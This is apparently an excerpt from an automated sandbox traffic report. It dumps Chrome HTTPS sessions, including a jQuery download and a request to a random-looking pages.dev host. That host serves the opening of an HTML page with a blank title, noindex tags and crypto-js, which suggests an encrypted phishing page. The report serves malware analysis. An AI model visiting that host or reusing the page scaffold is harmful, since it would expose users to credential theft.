                                                                2024-08-27 18:03:44 UTC1369INData Raw: 6c 54 6d 77 78 76 65 69 70 30 64 34 32 2b 57 65 41 58 7a 4e 73 62 69 33 51 7a 45 6a 62 47 4b 41 41 41 41 44 4c 2b 38 34 61 41 7a 65 72 4d 70 78 65 58 52 7a 31 7a 6a 36 39 35 38 71 78 75 35 38 64 6b 56 74 31 72 75 6e 72 6e 6f 5a 38 54 35 56 4a 4a 4f 77 45 73 76 43 63 75 31 6d 58 32 72 4d 66 71 75 75 46 5a 54 63 6f 46 37 33 57 75 32 75 55 59 33 57 57 76 73 71 57 39 4d 31 4e 2b 45 5a 64 73 76 33 42 32 41 41 41 41 63 38 5c 2f 44 6f 6e 4f 66 70 2b 41 63 51 41 64 63 4f 4b 74 79 77 75 72 38 75 6f 41 41 41 41 41 35 58 4f 37 75 71 7a 72 79 39 51 64 68 79 78 79 74 73 6d 33 55 48 6e 41 42 31 77 34 76 79 74 47 48 46 2b 56 67 35 5a 38 5c 2f 5a 43 38 2b 66 73 67 46 59 5c 2f 56 48 5a 78 78 2b 71 4f 77 41 41 4a 79 6d 35 38 64 33 46 36 48 48 4b 61 6f 4a 64 73 62 75 66 48
                                                                Data Ascii: lTmwxveip0d42+WeAXzNsbi3QzEjbGKAAAADL+84aAzerMpxeXRz1zj6958qxu58dkVt1runrnoZ8T5VJJOwEsvCcu1mX2rMfquuFZTcoF73Wu2uUY3WWvsqW9M1N+EZdsv3B2AAAAc8\/DonOfp+AcQAdcOKtywur8uoAAAAA5XO7uqzry9Qdhyxytsm3UHnAB1w4vytGHF+Vg5Z8\/ZC8+fsgFY\/VHZxx+qOwAAJym58d3F6HHKaoJdsbufH
                                                                2024-08-27 18:03:44 UTC1369INData Raw: 54 56 4d 73 33 4e 41 34 44 70 30 65 35 30 65 34 4c 78 2b 6d 66 44 57 53 61 6b 6a 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 54 6e 39 4b 63 64 7a 47 36 6d 37 74 57 66 30 31 4f 47 39 58 58 65 67 32 5c 2f 56 69 74 46 35 78 74 57 44 6e 4d 4a 72 76 4f 37 65 69 65 37 4f 72 4c 5c 2f 48 2b 54 71 7a 39 50 32 42 30 63 76 47 66 7a 5c 2f 77 44 58 56 7a 5c 2f 7a 42 51 47 39 43 44 4c 57 58 64 5a 71 69 78 67 72 70 39 7a 55 6e 4e 52 55 69 74 53 64 32 79 53 68 55 68 35 30 30 51 37 71 6e 75 6c 55 42 6a 47 67 44 47 73 41 47 4e 55 43 41 41 41 42 70 54 49 30 51 5a 35 76 5c 2f 77 44 4c 57 65 63 76 67 47 34 66 54 50 75 7a 4c 4b 7a 74 47 34 66 54 43 35 53 58 56 46 63 35 5a 7a 5a 62 58 54 47 37 38 61
                                                                Data Ascii: TVMs3NA4Dp0e50e4Lx+mfDWSakjQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATn9KcdzG6m7tWf01OG9XXeg2\/VitF5xtWDnMJrvO7eie7OrL\/H+Tqz9P2B0cvGfz\/wDXVz\/zBQG9CDLWXdZqixgrp9zUnNRUitSd2yShUh500Q7qnulUBjGgDGsAGNUCAAABpTI0QZ5v\/wDLWecvgG4fTPuzLKztG4fTC5SXVFc5ZzZbXTG78a
                                                                2024-08-27 18:03:44 UTC1369INData Raw: 75 6e 72 76 70 41 64 52 79 36 37 37 48 58 66 53 41 36 69 5a 6e 4c 37 4b 41 41 41 41 41 5a 62 71 62 61 35 5a 33 76 72 30 42 4e 75 37 74 67 41 4c 6d 46 38 39 6c 59 59 2b 62 39 6c 67 6a 6f 78 39 79 34 54 78 74 59 44 68 5a 5a 79 78 33 73 33 4e 4f 41 44 72 68 66 48 6f 35 4e 78 75 72 41 64 33 4c 50 6e 37 4f 72 6c 6e 7a 39 67 51 72 48 36 6f 6c 57 50 31 51 48 59 41 41 5a 62 4a 79 6d 35 7a 78 41 57 4f 58 58 66 59 36 37 37 41 36 6a 6e 4d 5c 2f 57 4c 6d 55 76 41 4e 41 41 45 35 5a 64 50 68 50 39 54 32 5c 2f 63 48 51 52 4d 39 33 6a 39 31 67 43 4c 6e 50 48 63 78 79 74 75 67 57 42 62 72 6b 41 52 63 35 34 6d 30 39 64 39 67 64 52 79 36 37 37 4e 6d 66 72 41 64 42 6b 79 6c 61 41 41 41 6a 4f 64 74 2b 69 32 57 62 6c 67 49 78 74 36 64 54 6d 4e 76 62 4b 58 31 37 56 47 4e 31 64
                                                                Data Ascii: unrvpAdRy677HXfSA6iZnL7KAAAAAZbqba5Z3vr0BNu7tgALmF89lYY+b9lgjox9y4TxtYDhZZyx3s3NOADrhfHo5NxurAd3LPn7Orlnz9gQrH6olWP1QHYAAZbJym5zxAWOXXfY677A6jnM\/WLmUvANAAE5ZdPhP9T2\/cHQRM93j91gCLnPHcxytugWBbrkARc54m09d9gdRy677NmfrAdBkylaAAAjOdt+i2WblgIxt6dTmNvbKX17VGN1d
                                                                2024-08-27 18:03:44 UTC1369INData Raw: 47 73 78 34 6e 78 47 67 41 41 7a 4c 36 62 38 4f 44 76 65 4c 38 4f 41 43 73 50 71 53 72 48 36 6f 44 73 41 41 41 41 41 41 4d 33 50 55 33 50 55 47 75 57 66 50 32 64 58 4c 50 6e 37 41 68 57 50 31 52 4b 73 66 71 67 4f 79 62 6a 4c 64 31 51 43 4f 6a 48 33 62 4d 5a 4f 45 33 50 30 54 31 5a 58 79 44 73 50 50 75 2b 6f 44 70 6e 7a 48 4d 41 62 6a 7a 50 6c 33 63 4d 65 5a 38 75 34 4f 65 66 4d 63 33 54 50 6d 4f 59 44 72 6a 6a 71 62 38 75 63 35 6e 79 37 67 41 41 6d 34 79 33 64 5a 30 59 2b 36 33 4f 35 2b 67 4b 6d 4d 6e 43 6e 48 71 79 76 6c 4f 37 36 67 39 44 6e 5c 2f 71 65 48 4d 41 62 4f 5a 38 73 62 4f 5a 38 67 37 67 41 41 41 4f 57 55 31 64 2b 76 38 75 72 4c 4e 7a 51 4a 6d 72 2b 72 7a 4f 57 63 58 71 6e 46 35 54 4c 30 33 56 2b 4b 36 58 58 62 48 58 61 2b 67 4b 45 59 33 56 36
                                                                Data Ascii: Gsx4nxGgAAzL6b8ODveL8OACsPqSrH6oDsAAAAAAM3PU3PUGuWfP2dXLPn7AhWP1RKsfqgOybjLd1QCOjH3bMZOE3P0T1ZXyDsPPu+oDpnzHMAbjzPl3cMeZ8u4OefMc3TPmOYDrjjqb8uc5ny7gAAm4y3dZ0Y+63O5+gKmMnCnHqyvlO76g9Dn\/qeHMAbOZ8sbOZ8g7gAAAOWU1d+v8urLNzQJmr+rzOWcXqnF5TL03V+K6XXbHXa+gKEY3V6
                                                                2024-08-27 18:03:44 UTC1369INData Raw: 57 7a 6d 66 4c 47 7a 6d 66 49 4f 37 6e 5c 2f 71 65 48 52 7a 5c 2f 41 4e 54 77 44 6d 41 44 30 41 41 4f 4f 66 31 58 37 66 77 37 4f 4f 66 31 58 37 66 77 43 56 59 66 56 45 71 77 2b 71 41 37 4f 57 66 4d 72 71 7a 4b 62 6d 67 63 42 74 6d 75 57 41 76 72 76 6f 72 48 4b 32 5c 2f 5a 79 58 68 7a 39 67 4d 35 33 2b 55 4f 32 55 33 50 66 77 34 32 61 35 42 73 75 72 74 30 36 34 35 41 4f 74 7a 6e 6a 75 35 32 32 38 73 56 30 39 72 62 39 67 53 41 44 76 6a 78 50 69 4e 5a 6a 78 50 69 4e 41 41 41 4c 4e 39 67 42 77 73 31 57 4f 39 6b 76 4c 6e 63 4c 4f 4f 38 5c 2f 63 45 41 41 72 71 79 39 57 62 74 38 31 67 41 44 5a 4c 65 41 59 37 59 7a 55 39 5c 2f 4a 6a 6a 4a 38 71 41 63 73 2b 66 73 36 75 57 66 50 32 42 43 73 66 71 69 56 59 5c 2f 56 41 64 6e 6e 76 4c 30 4f 65 65 50 6d 66 63 48 4e 57
                                                                Data Ascii: WzmfLGzmfIO7n\/qeHRz\/ANTwDmAD0AAOOf1X7fw7OOf1X7fwCVYfVEqw+qA7OWfMrqzKbmgcBtmuWAvrvorHK2\/ZyXhz9gM53+UO2U3Pfw42a5Bsurt0645AOtznju5228sV09rb9gSADvjxPiNZjxPiNAAALN9gBws1WO9kvLncLOO8\/cEAArqy9Wbt81gADZLeAY7YzU9\/JjjJ8qAcs+fs6uWfP2BCsfqiVY\/VAdnnvL0OeePmfcHNW


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.1649749151.101.130.1374433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:43 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                Host: code.jquery.com
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:43 UTC612INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 89501
                                                                Server: nginx
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                ETag: "28feccc0-15d9d"
                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Via: 1.1 varnish, 1.1 varnish
                                                                Accept-Ranges: bytes
                                                                Date: Tue, 27 Aug 2024 18:03:43 GMT
                                                                Age: 973605
                                                                X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740055-EWR
                                                                X-Cache: HIT, HIT
                                                                X-Cache-Hits: 5889, 1
                                                                X-Timer: S1724781823.165511,VS0,VE1
                                                                Vary: Accept-Encoding
                                                                2024-08-27 18:03:43 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                2024-08-27 18:03:43 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                2024-08-27 18:03:43 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                2024-08-27 18:03:43 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                2024-08-27 18:03:43 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                2024-08-27 18:03:43 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                2024-08-27 18:03:43 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                2024-08-27 18:03:43 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                2024-08-27 18:03:43 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                2024-08-27 18:03:43 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.1649747172.66.47.1114433684C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-08-27 18:03:43 UTC387OUTGET /, HTTP/1.1
                                                                Host: ahdjajsdgagsjhfgdfdhafghjafgfdjgahdfgsgdfghdsnmfbsds.pages.dev
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Sec-Fetch-Site: none
                                                                Sec-Fetch-Mode: cors
                                                                Sec-Fetch-Dest: empty
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en;q=0.9
                                                                2024-08-27 18:03:43 UTC786INHTTP/1.1 200 OK
                                                                Date: Tue, 27 Aug 2024 18:03:43 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Access-Control-Allow-Origin: *
                                                                Cache-Control: public, max-age=0, must-revalidate
                                                                referrer-policy: strict-origin-when-cross-origin
                                                                x-content-type-options: nosniff
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rzFI7kd%2BzRlj1eGCrDPZ%2FuCKfh0qKk2E2pGrxCA200gnRzUQZ5KW8bJjifaqYG0c6kJijwfTEHZEMJ7xoYVk%2B%2BLLpsQadJnu0BDudXc6waFpkPssAI1ix1Gl1GbZgI%2FymTsa3U7jRXqMcPlhglbs0NgeLQO98IBfcwewvLo3ClQlpWfbAwi%2BiHE7EtxPI1MPeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8b9dfadb0c7b8cc0-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-08-27 18:03:43 UTC583INData Raw: 31 37 33 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 3c 74 69 74 6c 65 3e e2 81 a4 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e
                                                                Data Ascii: 1736<html> <head> <title></title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.
